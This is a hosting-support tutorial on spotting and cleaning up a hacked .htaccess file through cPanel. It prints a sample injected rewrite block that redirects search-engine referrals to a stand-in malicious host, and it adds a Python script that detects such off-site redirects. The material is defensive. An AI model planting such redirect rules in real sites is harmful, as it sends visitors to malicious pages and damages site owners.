In this article we'll discuss steps you can take to clean up a .htaccess hack. The .htaccess file is primarily used to set up rewrite rules that control the way your site is accessed. You might not notice that your .htaccess file has been hacked until you either investigate manually or get a malware warning that your website is redirecting to a malicious site.

Sometimes you might notice in your web browser's status bar that a foreign website is attempting to load content on your website, or you might see a web browser warning. These can be common signs of a .htaccess hack. You might also notice that you've fallen in search engine rankings. The typical reason for this is that hackers will attempt to hack your .htaccess file so that when search engine bots crawl your website they are redirected to the website that the hacker has put in place instead of your own.

You can do a quick outside spot check using Google's Safe Browsing diagnostic page to see if they've detected anything malicious on your site in their most recent crawl. You would simply want to replace YourDomain.com with your actual domain name in the following URL:

http://google.com/safebrowsing/diagnostic?site=YourDomain.com

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  1. Log in to your cPanel.
  2. Under the Files section, click on File Manager.
  3. Select the Document Root for: option, and choose your domain from the drop-down.
  4. Ensure that Show Hidden Files is selected.
  5. Then click Go.
  6. Right-click on the .htaccess file and select Edit.
  7. You might have a text editor encoding dialog box pop up; you can simply click on Edit.
  8. Scroll through the document and look for any code that seems to be out of place. More than likely you'll see something along the following lines if your .htaccess file has been hacked:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
    </IfModule>

    This rewrite code checks the referrer of each request. If it's a popular search engine, the request is redirected to the MaliciousDomain.tld website, which tries to load the bad.php malicious script.

    Because these RewriteCond conditional statements wouldn't match for yourself, and only for search engine bots, these types of hacks can sometimes go unnoticed for some time. Unfortunately, the longer they're active, the more potential they have to affect your search engine ranking.

  9. To remove these malicious rewrites, highlight all of the text and hit Delete on your keyboard, then click on Save Changes at the top-right to save the file.

    If you aren't 100% confident that you've found malicious redirect code, we would recommend backing up your .htaccess file prior to making edits to it. This can be accomplished by right-clicking on the .htaccess file in the File Manager, selecting Copy, choosing a copy path such as /public_html/.htaccess-BAK, and finally clicking on Copy File(s).
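The manual review above can be backed by a scripted check. The following is an added example, not code from the original article: it flags any RewriteRule that sends traffic to a host outside your own domains when the rule is guarded by referrer or user-agent conditions, which is the shape of the injected block shown above. The function name, the sample file contents and the example.com domain are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a legitimate canonical redirect and a front-controller
# rule, followed by a shortened copy of the injected block shown above.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
</IfModule>
"""

COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

def find_suspicious_redirects(text, own_domains):
    """Flag RewriteRules that send referrer/user-agent-matched traffic off-site."""
    findings, pending = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # commented-out directives are inert
        cond = COND.match(line)
        if cond:
            pending.append(cond.group(2))  # applies to the next RewriteRule
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        host = (urlparse(rule.group(1)).hostname or "").lower()
        off_site = bool(host) and not any(
            host == d or host.endswith("." + d) for d in own_domains)
        if off_site and pending:
            findings.append({"line": lineno, "host": host, "patterns": pending})
        pending = []  # conditions never carry past a RewriteRule
    return findings

if __name__ == "__main__":
    for f in find_suspicious_redirects(SAMPLE, {"example.com"}):
        print(f"line {f['line']}: redirect to {f['host']} when {f['patterns']}")
```

The check ignores the rule's flags on purpose: mod_rewrite issues an external redirect for an absolute URL on another host even when [R] is absent. Treat a hit as a prompt for manual review, not as proof of compromise.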

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You'll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you're on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

Updated 2014-07-17 06:43 pm EST